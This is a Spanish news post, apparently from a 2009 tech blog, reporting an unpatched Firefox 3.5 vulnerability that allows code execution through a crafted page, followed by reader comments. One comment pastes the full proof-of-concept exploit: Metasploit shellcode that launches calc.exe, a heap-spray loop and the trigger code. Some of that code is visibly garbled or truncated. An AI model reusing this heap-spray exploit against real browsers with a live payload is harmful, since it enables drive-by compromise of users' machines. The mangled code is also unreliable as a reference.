Se acaba de descubrir una vulnerabilidad grave en Firefox 3.5 que puede permitir a un atacante la ejecución de código simplemente si se visita una página manipulada. De momento Mozilla no ha publicado un parche para paliar esta vulnerabilidad de seguridad, pero el exploit ha sido publicado y puede estar siendo explotado en estos momentos, poniendo en peligro la seguridad de todos los usuarios de Firefox 3.5.
Este grave problema de seguridad ha sido descubierto por Simon Berry-Byrne y explota un fallo en el procesador de código JavaScript de Firefox a la hora de manejar ciertas etiquetas HTML. Este fallo de seguridad afecta solo a la versión para Windows de Firefox 3.5 aunque con una pequeña modificación se podría extender al resto de plataformas.
Ante la falta de solución oficial por parte de Mozilla se recomienda desactivar javascript en Firefox
Fuente: Hispasec
Noticias relacionadas:
- Safari 4.0.2 disponible con mejor estabilidad, correcciones de seguridad y compatibilidad
- Google Chrome 3.0.191.3 beta: nueva versión beta del navegador de Google
- El martes 14 de julio no olvides que tienes una cita con Windows Update
Manuales relacionados:
- Manuales de seguridad
- Copia de seguridad Mozilla y compatibles (Firefox, Thunderbird, Flock …)
- Importar / Exportar contraseñas de Firefox
Artículos relacionados
- La seguridad de Firefox otra vez en entredicho. Nueva supuesta vulnerabilidad descubierta en Firefox 3.5.1 Mozilla la desmiente
- Mozilla Firefox 3.6.2: Mozilla soluciona la vulnerabilidad descubierta como crítica
- Descubierta una vulnerabilidad en Mozilla Firefox 3.6 considerada como crítica.
- Mozilla confirma una vulnerabilidad de seguridad crítica en Firefox
- Vulnerabilidad crítica en Firefox. La solución, la semana que viene en Firefox 3.0.8
Quien decia que Firefox es lo mas seguro que hay en la red hoy dia?.
Por que los anti Explorer, llevan diciendo eso muchisimo tiempo, esta visto que a todos les pueden meter goles.
Por este tipo de asuntos, veo sumamente importante cuidarse las espaldas con la extensión NoScript. Así, cada vez que entres a una página con scripts (no sólo los de java), automáticamente éstos serán bloqueados.
Espero que Mozilla repare pronto este problema.
Saludos.
La diferencia es que mozilla lo resolverá en pocos días. Y que a todos los que usen noscript no les va a afectar para nada, el poder personalizar un navegador tiene estas cosas.
Os recomiendo leeros este artículo
http://www.pijusmagnificus.com/blog/2009/07/14/primer-fallo-de-seguridad-grave-descubierto-en-firefox-3-5/
Firefox 3.5 Vulnerability
Firefox 3.5 Heap Spray Vulnerabilty
Author: SBerry aka Simon Berry-Byrne
Thanks to HD Moore for the insight and Metasploit for the payload
Loremipsumdoloregkuw
Loremipsumdoloregkuwiert
Loremikdkw
/* Calc.exe */
var shellcode = unescape(“%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800″ +
“%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A” +
“%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350″ +
“%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40″ +
“%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000″ +
“%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040″ +
“%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD” +
“%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40″ +
“%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18″ +
“%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0″ +
“%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B” +
“%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24″ +
“%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9″ +
“%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C” +
“%u652E%u6578%u9000″);
/* Heap Spray Code */
oneblock = unescape(“%u0c0c%u0c0c”);
var fullblock = oneblock;
while (fullblock.length<0×60000)
{
fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)
{
sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
function escapeData(data)
{
var i;
var c;
var escData=”;
for(i=0;i 0)
while (i<pTags.length)
{
oTags = pTags[i].getElementsByTagName(“font”)
searchArray[i+1] = new Array()
if (oTags[0])
{
searchArray[i+1]["str"] = oTags[0].innerHTML;
}
i++
}
}
}
function GenerateHTML()
{
var html = “”;
for (i=1;i<searchArray.length;i++)
{
html += escapeData(searchArray[i]["str"])
}
}
DataTranslator();
GenerateHTML()
trenti,todo programa que se precie tiene errores,no hay ninguno perfecto,pero siempre hay fanaticos…
Ya ves tu que tonteria ¿y acaso el internet explorer no tiene tropecientas vulnerabilidades de toda la vida?, Yo hace mucho que uso firefox pero antes usaba el IE y con todas sus vulnerabilidades nunca me paso nada, osea que me preocupa bien poco que firefox ahora misma tenga solo una, jajaja que chorrada de noticia.
Pues me acaba de avisar FF que tengo una actualización, ya veis sin más y con que rapidéz.